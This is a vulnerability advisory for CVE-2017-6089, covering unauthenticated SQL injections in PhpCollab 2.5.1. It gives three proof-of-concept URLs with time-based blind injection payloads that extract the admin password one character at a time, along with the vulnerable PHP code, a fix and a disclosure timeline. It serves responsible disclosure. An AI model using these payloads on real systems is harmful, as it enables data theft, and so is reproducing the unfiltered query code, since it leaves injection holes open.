扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 |
# [CVE-2017-6089] PhpCollab 2.5.1 Multiple SQL Injections (unauthenticated) ## Description PhpCollab is an open source web-based project management system, that enables collaboration across the Internet. ## SQL injections The phpCollab code does not correctly filter arguments, allowing arbitrary SQL code execution by an unauthenticated user. **CVE ID**: CVE-2017-6089 **Access Vector**: remote **Security Risk**: Critical **Vulnerability**: CWE-89 **CVSS Base Score**: 10 (Critical) **CVSS Vector String**: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:H ## Proof of Concept 1 The following HTTP request allows an attacker to extract data using SQL injections in either the <code>project</code> or <code>id</code> parameter(it requires at least one topic): </code><code> http://phpCollab.lan/topics/deletetopics.php?project=1'+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116))+and+'2'='2 http://phpCollab.lan/topics/deletetopics.php?project=1&id=1+and+(SELECT+SLEEP(5)+FROM+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116)) </code><code> ### Vulnerable code The vulnerable code is found in <code>topics/deletetopics.php</code>, line 9. </code><code> if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["topics"]." WHERE id = $id"; $tmpquery2 = "DELETE FROM ".$tableCollab["posts"]." WHERE topic = $id"; $pieces = explode(",",$id); $num = count($pieces); connectSql("$tmpquery1"); connectSql("$tmpquery2"); </code><code> ## Proof of Concept 2 The following HTTP request allows an attacker to extract data using SQL injections in the <code>id</code> parameter (it requires at least one saved bookmark): </code><code> http://phpCollab.lan/bookmarks/deletebookmarks.php?action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116) </code><code> ### Vulnerable code The vulnerable code is found in <code>bookmarks/deletebookmarks.php</code>, line 32. </code><code> if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["bookmarks"]." WHERE id IN($id)"; connectSql("$tmpquery1"); </code><code> ## Proof of Concept 3 The following HTTP request allows an attacker to extract some information using SQL injection in the <code>id</code> parameter (it requires at least one calendar entry): </code><code> http://phpCollab.lan/calendar/deletecalendar.php?project=&action=delete&id=select+sleep(5)+from+members+where+login+like+0x61646d696e+and+substr(password,1,1)+like+CHAR(116) </code><code> ### Vulnerable code The vulnerable code is found in <code>calendar/deletecalendar.php</code>, line 31. </code><code> if ($action == "delete") { $id = str_replace("**",",",$id); $tmpquery1 = "DELETE FROM ".$tableCollab["calendar"]." WHERE id IN($id)"; connectSql("$tmpquery1"); </code><code> **Notes** The application probably needs a security posture against injections, so other parameters and pages may be vulnerables. This advisory does not intend to be an exhaustive list of vulnerable parameters. ## Solution Update to the latest version avalaible. ## Affected versions * Version <= 2.5.1 ## Timeline (dd/mm/yyyy) * 27/08/2016 : Initial discovery. * 05/10/2016 : Initial contact. * 11/10/2016 : GPG Key exchange. * 19/10/2016 : Advisory sent to vendor. * 13/02/2017 : First fixes. * 15/02/2017 : Fixes validation by Sysdream. * 21/02/2017 : PhpCollab ask to wait before publish. * 21/06/2017 : New version has been released. * 29/09/2017 : Public disclosure. ## Credits * Nicolas SERRA, Sysdream(n.serra -at- sysdream -dot- com) -- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream |
体验盒子
